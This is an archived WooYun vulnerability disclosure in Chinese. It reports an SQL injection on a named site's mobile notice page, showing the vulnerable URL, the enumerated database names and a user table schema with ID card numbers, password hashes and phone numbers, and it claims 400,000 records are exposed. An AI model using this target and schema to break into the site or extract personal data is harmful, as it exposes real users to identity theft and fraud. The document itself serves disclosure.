乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开
RT.
http://wap.5262.com/index/notice?action=list&mstatus=1
available databases [9]:[*] accounts_data[*] billstable_data[*] borrow_data[*] gome_data[*] log_data[*] members_data[*] order_data[*] queue_data[*] test
Database: members_dataTable: data_users[53 columns]+------------------+-----------------------+| Column | Type |+------------------+-----------------------+| agent_reg | tinyint(1) || auth_time | int(10) || becomeManageTime | int(11) || bmz | varchar(10) || bumeng | varchar(8) || city | varchar(20) || email | varchar(30) || freezeMoney | varchar(60) || from_weixin | char(6) || fundStatus | tinyint(1) || hash | varchar(32) || IDcardNo | varchar(30) || imei | varchar(50) || income | float(11,2) || is_legal | tinyint(1) || isEmail | tinyint(1) || isexport | tinyint(1) || isgree | tinyint(1) || isLock | tinyint(2) || isManages | tinyint(2) || isMobile | tinyint(1) || ismzf | tinyint(4) || isPass | tinyint(1) || jgid | int(11) || lastloginDate | int(11) || loginNum | int(11) || manageDate | int(11) || mobile | varchar(11) || money | float(11,2) || moneyLock | tinyint(2) || myGroupID | varchar(20) || myIntoID | int(11) || myManageID | int(11) || myMoney | varchar(100) || passWord | varchar(32) || payPassWord | varchar(32) || platform | int(11) || preloginDate | int(11) || prov | varchar(20) || qrimage | varchar(200) || rank | tinyint(2) || realName | varchar(30) || regip | varchar(50) || regTime | int(11) || sourceId | varchar(100) || terminal | tinyint(4) || topRecommend | int(11) || userform | tinyint(1) || userid | int(11) || userName | varchar(30) || userSource | varchar(30) || userType | enum('1','2','3','4') || weixin_uid | varchar(32) |+------------------+-----------------------+
40W用户敏感信息泄露
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)